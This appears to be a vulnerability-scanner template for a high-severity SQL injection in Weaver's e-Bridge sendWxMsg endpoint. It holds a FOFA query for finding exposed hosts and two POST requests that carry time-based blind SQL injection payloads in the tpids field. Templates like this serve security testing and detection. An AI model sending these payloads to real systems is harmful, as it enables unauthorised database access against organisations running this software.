## id: VEID-2026-11104
## name: 泛微云桥 e-Bridge sendWxMsg 存在SQL注入漏洞
## author: hack007x
## severity: high
## tags: veid,sql,veid2026
## description: 泛微云桥 e-Bridge sendWxMsg 存在SQL注入漏洞，攻击者可进行sql注入攻击获取数据库信息或者权限。
## affects: 泛微云桥 e-Bridge
## fofa-query: (body="泛微云桥e-Bridge" && (body="wx.weaver.com.cn" || body="www.weaver.com.cn")) || header="EBRIDGE_JSESSIONID" || title="泛微云桥e-Bridge"
## verification: true



POST /wxthirdapi/sendWxMsg HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded

userids=-1&tpids=1%27+or+%28select+%2A+from+%28select+sleep%285%29%29x%29+or+%27x%27%3D%27x

#@ timeout: 20
#@ condition: and
#@ matcher: response_time >= 5
#@ matcher: body contains '(select sleep(5)'
#@ matcher: status_code == 200

---

POST /wxthirdapi/sendWxMsg HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded

userids=-1&tpids=1%27+or+%28select+%2A+from+%28select+sleep%288%29%29x%29+or+%27x%27%3D%27x

#@ timeout: 20
#@ condition: and
#@ matcher: response_time >= 8
#@ matcher: body contains '(select sleep(8)'
#@ matcher: status_code == 200


# @VEIL-STAMP: ec294a92fd7f849eb211626f8435e8077052aa88e01d7f13703026fdcfcc09f5
